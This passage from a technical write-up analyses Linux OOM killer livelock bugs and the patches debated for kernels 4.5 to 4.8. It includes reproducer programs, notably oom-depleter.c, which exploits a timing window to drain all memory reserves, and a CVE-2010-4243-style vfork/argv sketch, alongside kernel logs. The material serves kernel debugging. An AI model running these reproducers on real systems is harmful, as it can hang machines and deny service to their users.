(tgid=5398) [ 393.580423] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 395.744709] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 397.377497] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 399.614030] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 401.103803] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 402.484887] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 404.503755] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 406.433219] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 407.958772] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 410.094990] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 413.509253] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 416.820991] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 420.485121] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 422.302336] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 424.623738] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 425.204811] MemAlloc-Info: stalling=13 dying=3 exiting=1 victim=0 oom_count=161064 [ 425.592191] MemAlloc-Info: stalling=13 dying=3 exiting=1 victim=0 oom_count=161064 [ 430.507619] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 432.487807] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 436.810127] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 439.310553] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 441.404857] oom_reaper: unable to reap pid:5652 (tgid=5398) ---------- Example output end ----------
However, rewriting every operation which can be called while mmap_sem is held in exclusive mode so that it becomes killable is not realistic, because the error handling would become far too complicated. Therefore, in Linux 4.8, when the OOM reaper twice fails to acquire mmap_sem in shared mode, that mm_struct is treated as if reaping by the OOM reaper had already completed.
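To illustrate the error-handling burden, below is a rough sketch of what a "killable" conversion of just one call site would look like. down_write_killable() does exist in kernels of this era, but every one of the many down_write(&mm->mmap_sem) call sites would need to grow such a failure path, and the new error would then have to be propagated through every caller up the stack. This is an illustrative sketch, not a quote from the kernel source.

	/* Sketch of one converted call site (illustrative only). */
	if (down_write_killable(&mm->mmap_sem))
		return -EINTR;	/* a new failure mode which every caller
				 * up the stack must now cope with */
	/* ... critical section ... */
	up_write(&mm->mmap_sem);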
Now, let me explain the flow of the OOM killer as of Linux 4.8-rc1.
(kill1) | Same as (kill1) in Linux 4.7, so the explanation is omitted. |
(kill2) | If the current thread has not released its mm_struct yet, and all thread groups using that mm_struct are about to terminate (i.e. have the SIGNAL_GROUP_EXIT flag or the PF_EXITING flag set), releasing that mm_struct may produce free memory. Therefore, in order to avoid killing more processes than necessary, the TIF_MEMDIE flag is set on the current thread and the OOM reaper is invoked. Otherwise, same as (kill2) in Linux 4.7. |
(kill3) | Same as (kill3) in Linux 4.5, so the explanation is omitted. |
(kill4) | Same as (kill4) in Linux 4.7, so the explanation is omitted. |
(kill5) | oom_scan_process_thread() judges whether that thread group can become a candidate to be killed by the OOM killer. If that thread group contains a thread with the TIF_MEMDIE flag set, the MMF_OOM_REAPED flag is examined, and if the MMF_OOM_REAPED flag is set, that thread group is ignored (see the sketch following this list). Otherwise, same as (kill5) in Linux 4.7. |
(kill6) | oom_badness() judges how much that thread contributes to the OOM situation. In addition to the oom_score_adj value and the presence of the MMF_OOM_REAPED flag, the judgement of whether killing is appropriate now also examines whether that thread was created via vfork(). This is based on the assumption that, because a child process created via vfork() merely shares the mm_struct used by its parent process, killing such a child process is almost meaningless. (Trap 9) Otherwise, same as (kill6) in Linux 4.7. |
(kill7) | Same as (kill7) in Linux 4.5, so the explanation is omitted. |
(kill8) | oom_kill_process() performs the processing for actually sending the SIGKILL signal. If that thread has not released its mm_struct yet, and all thread groups using that mm_struct are about to terminate, releasing that mm_struct may produce free memory. Therefore, in order to avoid killing more processes than necessary, the TIF_MEMDIE flag is set on that thread, the OOM reaper is invoked, and control returns to the caller. |
(kill9) | Same as (kill9) in Linux 4.5, so the explanation is omitted. |
(kill10) | The SIGKILL signal is also sent to other thread groups using that mm_struct, provided that killing them via the OOM killer is appropriate. At this point, the oom_score_adj value is ignored. This is because, although the oom_score_adj value can be changed via /proc/$pid/oom_score_adj, no reason could be found for allowing multiple $pid sharing the same mm_struct to hold different oom_score_adj values, and therefore thread groups sharing the same mm_struct were changed to share the same oom_score_adj value (except when created via vfork()). (Trap 10) Also, when the mm_struct is shared with the init process (whose termination causes a kernel panic) or with a kernel thread (which is not appropriate to kill), the OOM reaper cannot be invoked. To avoid falling into the OOM livelock situation due to the inability to invoke the OOM reaper, the MMF_OOM_REAPED flag is set on that mm_struct so that the mm_struct is ignored by the check at (kill5). (Trap 11) Otherwise, same as (kill10) in Linux 4.6. |
(kill11) | If acquiring mmap_sem fails twice, the MMF_OOM_REAPED flag is set on that mm_struct. Otherwise, same as (kill11) in Linux 4.7. |
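To make the relationship between (kill5) and (kill11) easier to follow, here is a heavily simplified C-style sketch of the two checks described above. This is illustrative pseudocode condensed from the description for this text, not the actual Linux 4.8 source; the flag and return-value names are the real ones, everything else is simplified.

	/* Illustrative pseudocode only -- not the actual Linux 4.8 source. */

	/* (kill11): the OOM reaper gives up after the second failure to take
	 * mmap_sem in shared mode, and marks the mm as if it had been reaped. */
	if (!down_read_trylock(&mm->mmap_sem) && ++attempts >= 2)
		set_bit(MMF_OOM_REAPED, &mm->flags);

	/* (kill5): a TIF_MEMDIE thread normally makes the OOM killer wait for
	 * the victim, but an already-reaped mm is skipped so that the next
	 * victim can be selected instead of livelocking. */
	if (test_tsk_thread_flag(task, TIF_MEMDIE)) {
		if (test_bit(MMF_OOM_REAPED, &mm->flags))
			return OOM_SCAN_CONTINUE; /* ignore this thread group */
		return OOM_SCAN_ABORT;            /* keep waiting for the victim */
	}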
Now that we have finally started addressing the "falling into the OOM livelock situation even though the OOM killer was able to trigger" problem, we would like not merely to reduce the probability of falling into the OOM livelock situation, but to be able to prove that the OOM livelock situation cannot occur as long as the OOM killer can be invoked, right? Work aiming at making that provable is in progress for Linux 4.8.
Up to Linux 4.6, task_will_free_mem() performed its check per thread, and in Linux 4.7 per thread group; in Linux 4.8 it performs the check per mm_struct. However, regardless of whether the check is per thread, per thread group, or per mm_struct, as long as the same thread is allowed to use the task_will_free_mem() shortcut from out_of_memory() forever, the possibility of the OOM livelock situation remains. Therefore, in Linux 4.8, (kill2) is changed so that the task_will_free_mem() shortcut cannot be used when reaping by the OOM reaper has already completed.
So, will Linux 4.8 let us prove that the OOM livelock situation cannot occur? The answer is, "unfortunately, no". Thus, let me explain the remaining traps.
(Trap 9) derives from the assumption that the majority of memory consumption is associated with the mm_struct. There is a usage pattern of oom_score_adj in which a parent process that cannot be killed by the OOM killer (oom_score_adj set to -1000) creates a child process via vfork(), changes the child so that it can be killed by the OOM killer (oom_score_adj set to 0), and then has the child execute a program via the execve() system call. Because of this pattern, an exception is made which allows a child process created via vfork() to hold an oom_score_adj value different from its parent's. However, as CVE-2010-4243 demonstrated, even a child process created via vfork() can consume a considerable amount of memory which is not associated with the mm_struct, via the argv[]/envp[] arguments of the execve() system call. Therefore, the decision to exclude vfork()ed children from being killed is not always desirable. However, Michal Hocko's position was "whoever permits such a stupid operation is to blame", and the change was merged as-is.
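To make the scenario concrete, here is a minimal userland sketch combining the vfork() + oom_score_adj usage pattern with the CVE-2010-4243-style argv[] trick. The argument count and string size are placeholders chosen for illustration, and kernels fixed after CVE-2010-4243 cap the total argv[]/envp[] size, so treat this as a sketch of the pre-fix behavior rather than a working attack.

#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

#define NR_ARGS 65536 /* placeholder: enough duplicated strings to matter */

int main(void)
{
	static char *args[NR_ARGS + 2];
	char *arg = malloc(65536); /* one moderately sized string */
	int i;

	memset(arg, 'A', 65535);
	arg[65535] = '\0';
	args[0] = "/bin/true";
	for (i = 1; i <= NR_ARGS; i++)
		args[i] = arg; /* execve() copies every element separately */
	args[i] = NULL;
	/* Strictly speaking only execve()/_exit() are safe after vfork();
	 * this sketch bends that rule for brevity. */
	if (vfork() == 0) {
		/* The child shares the parent's mm_struct, but is made
		 * killable again, as in the usage pattern above. */
		int fd = open("/proc/self/oom_score_adj", O_WRONLY);
		write(fd, "0", 1);
		close(fd);
		/* The copies made here are not charged to the shared
		 * mm_struct, so killing this child frees almost nothing. */
		execve("/bin/true", args, NULL);
		_exit(1);
	}
	return 0;
}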
(Trap 10) is meant to avoid falling into the OOM livelock situation caused by being unable to start the OOM reaper due to an "extremely twisted multithreading" construct. A case where a parent process and a child process created via vfork() differ in whether they can be killed by the OOM killer can also be regarded as "extremely twisted multithreading". However, a program which creates "twisted multithreading" must have some reason for doing so in the first place. For example, we cannot rule out the possibility that a program behaving as "extremely twisted multithreading" exists precisely in order to test the situation just before the OOM killer triggers.
(Trap 11) is the only remaining location for which we cannot prove that the OOM livelock situation does not occur as long as the OOM killer can be invoked.
As a method for avoiding the OOM livelock situation even when the OOM reaper cannot be invoked, one could delegate to the OOM reaper the judgement of whether it is safe to perform memory reclaim, so that "the OOM killer always invokes the OOM reaper whenever it sets the TIF_MEMDIE flag". However, Michal Hocko's position is "when it is clear that memory reclaim cannot be performed, I want to handle it inside the OOM killer without handing it over to the OOM reaper", and he keeps rejecting this method.
As a method for "handling it inside the OOM killer without handing it over to the OOM reaper", one could clear the TIF_MEMDIE flag set at (kill9) at the same time the MMF_OOM_REAPED flag is set at (kill10). When the OOM reaper started clearing the TIF_MEMDIE flag in Linux 4.6, a change which makes the OOM reaper's kernel thread freezable was also merged, in order to avoid a race with the suspend operation. However, a later investigation revealed that making the kernel thread freezable had not actually avoided the race with the suspend operation. The position then became "since we want to do without a patch for avoiding the race with the suspend operation, we want to avoid the behavior where the OOM reaper or the OOM killer clears the TIF_MEMDIE flag", and therefore the method of clearing the TIF_MEMDIE flag at (kill10) also keeps being rejected.
As a result, what is going to be merged in Linux 4.8 is the behavior that, in the check at (kill5), the mm_struct is ignored when the MMF_OOM_REAPED flag is set, even if the TIF_MEMDIE flag is also set. However, there is a problem: the find_lock_task_mm() function, which is called in the check at (kill5) in order to obtain the mm_struct used by the thread group containing a TIF_MEMDIE thread, cannot obtain the mm_struct after all threads of that thread group have released it. As a method for handling this problem, one could return OOM_SCAN_CONTINUE instead of OOM_SCAN_ABORT when find_lock_task_mm() cannot obtain the mm_struct used by a thread group containing a TIF_MEMDIE thread. However, the position was "this is not something that needs an urgent fix for Linux 4.8", and this method was also rejected. As a result, OOM_SCAN_ABORT is returned when find_lock_task_mm() cannot obtain that mm_struct, and a small possibility of falling into the OOM livelock situation remains. (What a pity!)
By the way, the OOM reaper is available only on kernels with MMU support (kernels compiled with the CONFIG_MMU=y kernel config option). Since the OOM reaper is not available on kernels without MMU support (kernels compiled without specifying CONFIG_MMU=y), for MMU-less kernels nothing has been improved at all regarding the "falling into the OOM livelock situation even though the OOM killer was able to trigger" problem, let alone proving that it cannot occur. Since nobody runs tests on MMU-less kernels, it is even possible that the fixes made for kernels with MMU support have made the OOM livelock situation more likely on MMU-less kernels. A timeout-based method would also work on MMU-less kernels, but Michal Hocko's position is "I have never heard of an OOM livelock occurring in a MMU-less environment in the first place (a MMU-less environment should not allow such reckless memory usage that causes OOM livelock)", so there is no prospect of it being addressed.
It is about time we finished with the "falling into the OOM livelock situation even though the OOM killer was able to trigger" problem and concentrated on handling the far nastier "falling into the OOM livelock situation without being able to invoke the OOM killer" problem.
As I explained in the section about timeout-based workarounds, we would be able to avoid the OOM livelock situation if we were allowed to invoke the OOM killer based on some timeout. But so far there is no prospect of timeout-based judgement being accepted. And due to the existence of the "too small to fail" memory-allocation rule, we can do nothing once an OOM livelock situation has occurred.
Then, at least we want to be notified of stalling memory allocation requests when an OOM livelock situation might be occurring. Otherwise, when a system hangs up, we cannot tell whether the cause is related to memory allocation requests.
Therefore, I have been proposing the Kernel Memory Allocation Watchdog (kmallocwd) functionality, which monitors memory allocation requests in kernel space. (The MemAlloc: lines in this page are output by this functionality.)
Addressing bugs caused by software resembles identifying the criminal and turning them in by yourself. Since the Linux kernel's memory management subsystem does not print any message when something unexpected is occurring, the skill of identifying the criminal and turning them in by yourself is especially strongly required. But not all Linux users have such a skill.
This functionality is an important first step for isolating the problem, but there is no prospect of it being accepted, because the justification / necessity of adding such a large amount of processing is considered questionable. Unless enough people report problems as "this may be a bug related to the memory management subsystem" to bother the memory management people, the memory management people will keep asserting innocence without knowing what problems are occurring.
In this section, I enumerate various memory management bugs under OOM situations which were not explained in the sections above. For each bug, I attach a reproducer program as needed.
Since a SysRq-f request from the keyboard is processed in interrupt context, it cannot synchronously wait for completion of the OOM killer. Therefore, SysRq-f enqueues a request to invoke the OOM killer into system_wq, a workqueue which is shared among the whole system, and the OOM killer is asynchronously invoked by a workqueue kernel thread. But while that workqueue is busy processing other requests, it cannot process the request to invoke the OOM killer.
Therefore, when the workqueue gets stuck due to an OOM livelock situation, the workqueue can never invoke the OOM killer, and the system cannot recover from the OOM livelock situation using the SysRq-f request.
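For reference, the same request can also be issued without a physical keyboard; either way the actual kill is deferred to system_wq, so both paths are equally subject to the situation described above.
# echo f > /proc/sysrq-trigger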
Since the OOM reaper was introduced, the TIF_MEMDIE flag is automatically cleared by the OOM reaper, and the OOM killer can continue selecting the next OOM victim. Therefore, in many cases, falling into the OOM livelock situation is avoided.
As I demonstrated in the memset+write case, the OOM killer invoked by a SysRq-f request selects the next OOM victim even if there is a thread with the TIF_MEMDIE flag set. But the logic of select_bad_process() simply selects the thread group with the largest oom_badness() value, without taking into account whether that thread group already contains a TIF_MEMDIE thread. As a result, once an OOM livelock situation has occurred, SysRq-f forever selects a thread with the TIF_MEMDIE flag already set, and the system cannot recover from the OOM livelock situation using the SysRq-f request.
Since the OOM reaper was introduced, thread groups containing a TIF_MEMDIE thread are automatically ignored, and the OOM killer can continue selecting the next OOM victim. Therefore, in many cases, falling into the OOM livelock situation is avoided.
As I explained regarding the OOM killer's behavior, a terminating thread releases its mm_struct in exit_mm() called from do_exit() and then clears the TIF_MEMDIE flag. Therefore, setting the TIF_MEMDIE flag via task_will_free_mem(current) in out_of_memory() must be permitted only while the current thread has not yet released its mm_struct.
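In other words, the shortcut needs a guard along the lines of the sketch below. This is illustrative pseudocode condensed from the description above for this text, not the actual patch.

	/* Illustrative pseudocode of the missing guard (not the actual fix). */
	if (current->mm && task_will_free_mem(current)) {
		/* Safe: current still owns a mm_struct whose release will
		 * produce free memory, so granting TIF_MEMDIE makes sense. */
		set_tsk_thread_flag(current, TIF_MEMDIE);
		return;
	}
	/* Without the current->mm check, a thread which already passed
	 * exit_mm() could regain TIF_MEMDIE and never clear it again. */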
But since such a check was not performed, a child process which had been killed by the OOM killer got the TIF_MEMDIE flag again; the parent process could not reap the child process because its own memory allocation request was in progress, while the TIF_MEMDIE flag set on the child process blocked the memory allocation request by the parent process, which resulted in an OOM livelock situation.
This bug was fixed by commit d7a94e7e11badf84 ("oom: don't count on mm-less current process") and commit 83363b917a2982dd ("oom: make sure that TIF_MEMDIE is set under task_lock").
Between Linux 3.19-rc6 and Linux 3.19-rc7, commit 9879de7373fc ("mm: page_alloc: embed OOM killing naturally into allocation slowpath") was merged. Originally the patch was merely meant to be a cleanup, but it had the side effect of making GFP_NOFS / GFP_NOIO allocation requests no longer retry (in other words, the "too small to fail" memory-allocation rule no longer applied to them), and a completely unusable situation occurred where the ext4 filesystem got errors simply because the OOM killer was invoked.
Of course, it would be best if we could get rid of the "too small to fail" memory-allocation rule. But suddenly removing it without any preparation, like a sucker punch, is not acceptable. Therefore, the original behavior was restored by commit cc87317726f85153 ("mm: page_alloc: revert inadvertent !__GFP_FS retry behavior change").
Then, an attempt was made to limit the number of retries of a memory allocation request using a /proc/sys/vm/nr_alloc_retry interface. But since nobody actively tests behavior under out-of-memory situations, there was no chance to gradually decrease the number of retries, and the attempt vanished in smoke. Therefore, the "too small to fail" memory-allocation rule still exists.
Instead of the /proc/sys/vm/panic_on_oom interface, which triggers a kernel panic immediately as soon as the OOM killer is invoked, an attempt was made to trigger the kernel panic only when an OOM livelock situation was not resolved within a threshold period (controlled by a /proc/sys/vm/panic_on_oom_timeout interface) after the OOM killer was invoked. But since we did not come to an agreement on when to trigger the kernel panic, this attempt also vanished in smoke.
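For comparison, the interface which does exist today can be enabled as follows; a value of 1 triggers a kernel panic whenever the system-wide OOM killer is invoked.
# echo 1 > /proc/sys/vm/panic_on_oom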
In the background, there was a conflict between "the system should be rebooted via a kernel panic rather than selecting the next OOM victim if the OOM livelock situation is not resolved within a predetermined period" and "rebooting the system via a kernel panic is too much, because there is a possibility that selecting the next OOM victim several times can resolve the OOM livelock situation".
This topic is about pointing out a flaw in the abovementioned commit 83363b917a2982dd ("oom: make sure that TIF_MEMDIE is set under task_lock") patch. When the patch was proposed, I commented that "we should set the TIF_MEMDIE flag after sending the SIGKILL signal". But at that time, my comment was rejected with the response "it makes no difference because the process will be terminated anyway". Therefore, I demonstrated how large the time window between setting the TIF_MEMDIE flag and sending the SIGKILL signal can become, using the fact that printing kernel messages via printk() is a rather slow operation.
---------- oom-depleter.c start ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>

static int null_fd = EOF;
static char *buf = NULL;
static unsigned long size = 0;

static int dummy(void *unused)
{
	pause();
	return 0;
}

static int trigger(void *unused)
{
	read(null_fd, buf, size); /* Will cause OOM due to overcommit */
	return 0;
}

int main(int argc, char *argv[])
{
	int pipe_fd[2] = { EOF, EOF };
	unsigned long i;
	null_fd = open("/dev/zero", O_RDONLY);
	pipe(pipe_fd);
	for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
		char *cp = realloc(buf, size);
		if (!cp) {
			size >>= 1;
			break;
		}
		buf = cp;
	}
	/*
	 * Create many child threads in order to enlarge time lag between
	 * the OOM killer sets TIF_MEMDIE to thread group leader and
	 * the OOM killer sends SIGKILL to that thread.
	 */
	for (i = 0; i < 1000; i++) {
		clone(dummy, malloc(1024) + 1024, CLONE_SIGHAND | CLONE_VM,
		      NULL);
		if (!i)
			close(pipe_fd[1]);
	}
	/* Let a child thread trigger the OOM killer. */
	clone(trigger, malloc(4096) + 4096, CLONE_SIGHAND | CLONE_VM, NULL);
	/* Wait until the first child thread is killed by the OOM killer. */
	read(pipe_fd[0], &i, 1);
	/* Deplete all memory reserve using the time lag. */
	for (i = size; i; i -= 4096)
		buf[i - 1] = 1;
	return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter.c end ----------
---------- Example output start ---------- [ 38.613801] sysrq: SysRq : Show Memory [ 38.616506] Mem-Info: [ 38.618106] active_anon:18185 inactive_anon:2085 isolated_anon:0 [ 38.618106] active_file:10615 inactive_file:18972 isolated_file:0 [ 38.618106] unevictable:0 dirty:7 writeback:0 unstable:0 [ 38.618106] slab_reclaimable:3015 slab_unreclaimable:4217 [ 38.618106] mapped:9940 shmem:2146 pagetables:1319 bounce:0 [ 38.618106] free:378300 free_pcp:486 free_cma:0 [ 38.640475] Node 0 DMA free:9980kB min:400kB low:500kB high:600kB active_anon:2924kB inactive_anon:80kB active_file:816kB inactive_file:896kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:596kB shmem:80kB slab_reclaimable:240kB slab_unreclaimable:308kB kernel_stack:80kB pagetables:64kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 38.655621] lowmem_reserve[]: 0 1731 1731 1731 [ 38.657497] Node 0 DMA32 free:1503220kB min:44652kB low:55812kB high:66976kB active_anon:69816kB inactive_anon:8260kB active_file:41644kB inactive_file:74992kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:28kB writeback:0kB mapped:39164kB shmem:8504kB slab_reclaimable:11820kB slab_unreclaimable:16560kB kernel_stack:3472kB pagetables:5212kB unstable:0kB bounce:0kB free_pcp:1944kB local_pcp:668kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 38.672950] lowmem_reserve[]: 0 0 0 0 [ 38.673726] Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB [ 38.676854] Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB [ 38.680159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 38.681517] 31733 total pagecache pages [ 38.682162] 0 pages in swap cache [ 38.682711] Swap cache stats: add 0, delete 0, find 0/0 [ 38.683554] Free swap = 0kB [ 38.684053] Total swap = 0kB [ 38.684528] 524157 pages RAM [ 38.685022] 0 pages HighMem/MovableOnly [ 38.685645] 76583 pages reserved [ 38.686173] 0 pages hwpoisoned [ 48.046321] oom-depleter invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0 [ 48.047754] oom-depleter cpuset=/ mems_allowed=0 [ 48.048779] CPU: 1 PID: 4797 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80 [ 48.050612] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 48.052434] 0000000000000000 000000004ecba3fc ffff88006c4938d0 ffffffff81614c2f [ 48.053816] ffff88006c482580 ffff88006c493970 ffffffff81611671 0000000000001000 [ 48.055218] ffff88006c493918 ffffffff8109463c ffff8800784b2b40 ffff88007fc556f8 [ 48.057428] Call Trace: [ 48.058775] [<ffffffff81614c2f>] dump_stack+0x44/0x55 [ 48.060647] [<ffffffff81611671>] dump_header+0x84/0x21c [ 48.062591] [<ffffffff8109463c>] ? update_curr+0x9c/0xe0 [ 48.064393] [<ffffffff810917f7>] ? __enqueue_entity+0x67/0x70 [ 48.066506] [<ffffffff81096b59>] ? set_next_entity+0x69/0x360 [ 48.068633] [<ffffffff81091ee0>] ? pick_next_entity+0xa0/0x150 [ 48.070768] [<ffffffff8110fad4>] oom_kill_process+0x364/0x3d0 [ 48.072874] [<ffffffff81281550>] ? 
security_capable_noaudit+0x40/0x60 [ 48.074948] [<ffffffff8110fd83>] out_of_memory+0x1f3/0x490 [ 48.076820] [<ffffffff81115214>] __alloc_pages_nodemask+0x904/0x930 [ 48.078885] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0 [ 48.080781] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960 [ 48.082936] [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0 [ 48.084981] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 48.086791] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 48.088636] [<ffffffff81096b59>] ? set_next_entity+0x69/0x360 [ 48.090630] [<ffffffff8161c918>] page_fault+0x28/0x30 [ 48.092359] [<ffffffff813124c0>] ? __clear_user+0x20/0x50 [ 48.094065] [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250 [ 48.095939] [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0 [ 48.097690] [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0 [ 48.099545] [<ffffffff8117b489>] vfs_read+0x79/0x120 [ 48.101129] [<ffffffff8117c1a0>] SyS_read+0x50/0xc0 [ 48.102648] [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71 [ 48.104388] Mem-Info: [ 48.105396] active_anon:410470 inactive_anon:2085 isolated_anon:0 [ 48.105396] active_file:0 inactive_file:31 isolated_file:0 [ 48.105396] unevictable:0 dirty:0 writeback:0 unstable:0 [ 48.105396] slab_reclaimable:1689 slab_unreclaimable:5719 [ 48.105396] mapped:390 shmem:2146 pagetables:2097 bounce:0 [ 48.105396] free:12966 free_pcp:63 free_cma:0 [ 48.114279] Node 0 DMA free:7308kB min:400kB low:500kB high:600kB active_anon:6764kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 48.124147] lowmem_reserve[]: 0 1731 1731 1731 [ 48.125753] Node 0 DMA32 free:44556kB min:44652kB low:55812kB high:66976kB active_anon:1635116kB inactive_anon:8260kB active_file:0kB inactive_file:124kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1552kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:252kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1620 all_unreclaimable? yes [ 48.137007] lowmem_reserve[]: 0 0 0 0 [ 48.138514] Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB [ 48.143010] Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB [ 48.148196] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 48.150810] 2156 total pagecache pages [ 48.152318] 0 pages in swap cache [ 48.154200] Swap cache stats: add 0, delete 0, find 0/0 [ 48.156089] Free swap = 0kB [ 48.157400] Total swap = 0kB [ 48.158694] 524157 pages RAM [ 48.160055] 0 pages HighMem/MovableOnly [ 48.161496] 76583 pages reserved [ 48.162989] 0 pages hwpoisoned [ 48.164453] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name (...snipped...) 
[ 50.061069] [ 4797] 1000 4797 541715 392157 776 6 0 0 oom-depleter [ 50.062841] Out of memory: Kill process 3796 (oom-depleter) score 877 or sacrifice child [ 50.064684] Killed process 3796 (oom-depleter) total-vm:2166860kB, anon-rss:1568628kB, file-rss:0kB [ 50.066454] Kill process 3797 (oom-depleter) sharing same memory (...snipped...) [ 50.247563] Kill process 3939 (oom-depleter) sharing same memory [ 50.248677] oom-depleter: page allocation failure: order:0, mode:0x280da [ 50.248679] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80 [ 50.248680] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 50.248682] 0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f [ 50.248683] 00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000 [ 50.248684] ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30 [ 50.248684] Call Trace: [ 50.248689] [<ffffffff81614c2f>] dump_stack+0x44/0x55 [ 50.248692] [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150 [ 50.248693] [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930 [ 50.248695] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0 [ 50.248697] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960 [ 50.248702] [<ffffffff8100d6dc>] ? __switch_to+0x23c/0x470 [ 50.248704] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 50.248706] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 50.248707] [<ffffffff8161c918>] page_fault+0x28/0x30 [ 50.248708] Mem-Info: [ 50.248710] active_anon:423405 inactive_anon:2085 isolated_anon:0 [ 50.248710] active_file:7 inactive_file:10 isolated_file:0 [ 50.248710] unevictable:0 dirty:0 writeback:0 unstable:0 [ 50.248710] slab_reclaimable:1689 slab_unreclaimable:5719 [ 50.248710] mapped:393 shmem:2146 pagetables:2097 bounce:0 [ 50.248710] free:0 free_pcp:21 free_cma:0 [ 50.248714] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no [ 50.248715] lowmem_reserve[]: 0 1731 1731 1731 [ 50.248717] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 